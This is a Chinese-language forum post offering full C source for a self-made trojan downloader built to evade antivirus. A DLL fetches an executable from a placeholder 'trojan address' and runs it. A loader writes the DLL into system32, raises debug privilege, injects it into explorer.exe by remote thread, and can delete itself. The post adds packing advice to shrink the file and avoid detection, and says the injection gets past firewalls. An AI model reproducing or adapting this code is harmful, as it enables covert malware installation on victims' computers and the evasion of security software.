|
自写的downloader代码,免杀哦![原创]
看见大家都是到处发表教程,一时也心痒!我呢,不学无术,哪里写错的地方请原谅!
首先的我的代码是网上的,我自是平凑一下,在这里感谢原作者。
downloader网上也公布很多,但是大都是被kill了,这种常用的小工具最好自己编,才好免杀。
思路,运用一个dll插入线程,这样就可以传墙了。(呵呵)
步骤:
先写个dll,这个我用lcc编写:
//////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <urlmon.h>
DWORD WINAPI DLLDownMain (LPVOID lpNot);
char DownURL[100] = {"换成木马的地址"};
char PathAndFileName[100] = {"tnt.exe"};
BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
DWORD ThreadID=0;
HANDLE hThread=NULL;
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hThread=CreateThread(NULL,0,DLLDownMain,NULL,0,&ThreadID);
if (hThread==NULL)break;
// The DLL is being loaded for the first time by a given process.
// Perform per-process initialization here. If the initialization
// is successful, return TRUE; if unsuccessful, return FALSE.
break;
case DLL_PROCESS_DETACH:
// The DLL is being unloaded by a given process. Do any
// per-process clean up here, such as undoing what was done in
// DLL_PROCESS_ATTACH. The return value is ignored.
break;
case DLL_THREAD_ATTACH:
// A thread is being created in a process that has already loaded
// this DLL. Perform any per-thread initialization here. The
// return value is ignored.
break;
case DLL_THREAD_DETACH:
// A thread is exiting cleanly in a process that has already
// loaded this DLL. Perform any per-thread clean up here. The
// return value is ignored.
break;
}
return TRUE;
}
DWORD WINAPI DLLDownMain (LPVOID lpNot)
{
char *pDownURL = NULL;
char *pPathAndFileName = NULL;
pDownURL = DownURL;
pPathAndFileName =PathAndFileName;
if (URLDownloadToFile(0, pDownURL,PathAndFileName, 0, 0) == S_OK)
{
WinExec(PathAndFileName, SW_SHOW);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////
lcc编译完,大小是5k左右!
然后把这个dll用exe2hex工具转换成十六进制的文本。
编写downloader的主体,我用vc编写:
/////////////////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include<windows.h>
#include<stdio.h>
#include <psapi.h>
#include <shlobj.h>
#include <SHELLAPI.H>
#include <dll.h>
#pragma comment(lib,"psapi.lib")
#pragma comment(lib,"msvcrt.lib")
#pragma comment(linker, "/SECTION:.text,REW")
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
int InjectDll(const char *FullName, const DWORD Pid);
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024]);
int AddPrivilege(const char *Name);
BOOL SelfDelete(void);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
char achAim[MAX_PATH + 1];
const char *pszLibFileName = "windll.dll";//dll的文件名
const char DESTPROC[19] = "EXPLORER.EXE";//注入的进程名
GetSystemDirectory(achAim, sizeof(achAim));
strcat(achAim,"\\");
strcat(achAim,pszLibFileName);
FILE *fp;
if ((fp = fopen(achAim, "wb")) != NULL)
{
fwrite(Dll_Data, sizeof(Dll_Data), 1, fp);
fclose(fp);
}else{
return 0;
}
//
DWORD Pid;
if ((Pid = ProcessToPID(DESTPROC, NULL)) != 0)
{
InjectDll(achAim, Pid);
}
//SelfDelete();////想要主体程序自我删除功能请去掉前边的斜杠。
return 0;
}
int InjectDll(const char *FullName, const DWORD Pid)
{
HANDLE hRemoteProcess;
//如果是要打开系统进程,一定要先申请debug权限
AddPrivilege(SE_DEBUG_NAME);
if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE | //允许远程VM写
PROCESS_VM_READ, //允许远程VM读
0,
Pid)) == NULL)
{
return 1;
}
char *pDllName;
if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(FullName) + 1,
MEM_COMMIT,
PAGE_READWRITE)) == NULL)
{
return 1;
}
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if (WriteProcessMemory(hRemoteProcess,
pDllName,
(void *)FullName,
lstrlen(FullName),
NULL) == 0)
{
return 1;
}
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr;
if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
{
return 1;
}
HANDLE hRemoteThread;
DWORD ThreadId;
if ((hRemoteThread = CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程
NULL,
0,
pfnStartAddr, //LoadLibraryA的入口地址
pDllName,
0,
&ThreadId)) == NULL)
{
return 1;
}
return 0;
}
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024])
{
typedef BOOL (CALLBACK* EnumProcessesType)(DWORD *,DWORD,DWORD *);
typedef BOOL (CALLBACK* EnumProcessModulesType)(HANDLE,HMODULE *,DWORD,LPDWORD);
typedef DWORD (CALLBACK* GetModuleBaseNameType)(HANDLE, HMODULE, LPTSTR, DWORD);
EnumProcessesType EnumProcesses;
EnumProcessModulesType EnumProcessModules;
GetModuleBaseNameType GetModuleBaseName;
HMODULE hmPsapi = GetModuleHandle("psapi.dll");
if (hmPsapi == NULL)
{
if ((hmPsapi = LoadLibrary("psapi.dll")) == NULL)
{
return 0;
}
}
EnumProcesses = (EnumProcessesType)GetProcAddress(hmPsapi, "EnumProcesses");
EnumProcessModules = (EnumProcessModulesType)GetProcAddress(hmPsapi, "EnumProcessModules");
GetModuleBaseName = (GetModuleBaseNameType)GetProcAddress(hmPsapi, "GetModuleBaseNameA");
if (!(EnumProcesses &&
EnumProcessModules &&
GetModuleBaseName))
{
FreeLibrary(hmPsapi);
#ifdef _DEBUG
printf("GetProcAddress() error : %d\n", GetLastError());
#endif
return 0;
}
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i , j;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnknownProcess";
// 计算目前有多少进程, aProcesses[]用来存放有效的进程PID
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
#ifdef _DEBUG
printf("EnumProcesses() error : %d\n", GetLastError());
#endif
FreeLibrary(hmPsapi);
return 0;
}
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0, j = 0; i < cProcesses; i++ )
{
// 打开特定PID的进程
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE,
aProcesses[i]);
// 取得特定PID的进程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
//将取得的进程名与输入的进程名比较,如相同则返回进程PID
if(!stricmp(szProcessName, ProcessName))
{
CloseHandle( hProcess );
//如果接收缓冲区有效,就依次填入pid,否则立即返回
if (aPid != NULL)
{
aPid[j++] = aProcesses[i];
}
else
{
FreeLibrary(hmPsapi);
return aProcesses[i];
}
}
}
}
}
CloseHandle( hProcess );
if (aPid != NULL)
{
FreeLibrary(hmPsapi);
return aPid[0];
}
FreeLibrary(hmPsapi);
return 0;
}
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
return 1;
}
if (!LookupPrivilegeValue(NULL,Name,&Luid))
{
return 1;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(hToken,
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL))
{
return 1;
}
return 0;
}
BOOL SelfDelete(void)
{
SHELLEXECUTEINFO sei;
TCHAR szModule [MAX_PATH],
szComspec[MAX_PATH],
szParams [MAX_PATH];
// get file path names
if((GetModuleFileName(0,szModule,MAX_PATH)!=0) &&
(GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
(GetEnvironmentVariable("COMSPEC",szComspec,MAX_PATH)!=0))
{
// create comspec parameters
lstrcpy(szParams,"/c del "); // run a single command to...
lstrcat(szParams, szModule); // del(ete) module file and...
lstrcat(szParams, " > nul"); // output results to nowhere
// set struct members
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile= szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0;
sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
// give all CPU cycles to current process
SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);
// execute command shell
if(ShellExecuteEx(&sei))
{
// freeze command shell process
SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS);
SetProcessPriorityBoost(sei.hProcess,TRUE);
// notify explorer shell of deletion
SHChangeNotify(SHCNE_DELETE,SHCNF_PATH,szModule,0);
return TRUE;
}
else
{
// otherwise, restore normal priority
SetPriorityClass(GetCurrentProcess(),NORMAL_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_NORMAL);
}
}
return FALSE;
}
//////////////////////////////////////////////////////////////////////////////////
这里的<dll.h>的头文件就是上边的dll十六进制的文本,把他放在一个Dll_Data的数组内,这样编译会有“4 warning”,可以不必理会,大小约16k,然后再用
WinUpack.exe压缩,最后生成的文件大小是4k左右!
这个exe运行后会在system32目录下生成一个windll.dll(可以改)的文件,同时把dll文件插入线程,如果系统下已经有windll.dll文件,就自动退出,避免重复种木马。
呵呵,我的语文水平不高,有什么不理解的地方到pcshare官方交流群里提问吧!
|
